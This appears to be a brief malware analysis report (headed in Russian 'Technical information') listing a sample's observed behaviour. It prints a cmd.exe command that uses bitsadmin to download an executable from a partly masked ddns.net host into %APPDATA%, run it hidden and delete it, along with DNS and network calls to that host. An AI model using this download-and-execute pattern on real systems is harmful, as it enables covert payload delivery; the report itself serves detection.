Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a7ff http://pr######lfha.ddns.net:80/a %APPDATA%\a7ff.exe&%APPDATA%\a7ff.exe&del %APPDATA%\a7ff.exe
- 'pr#####alfha.ddns.net':80
- DNS ASK pr#####alfha.ddns.net
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer a7ff http://pr######lfha.ddns.net:80/a %APPDATA%\a7ff.exe&%APPDATA%\a7ff.exe&del %APPDATA%\a7ff.exe' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer a7ff http://pr######lfha.ddns.net:80/a %APPDATA%\a7ff.exe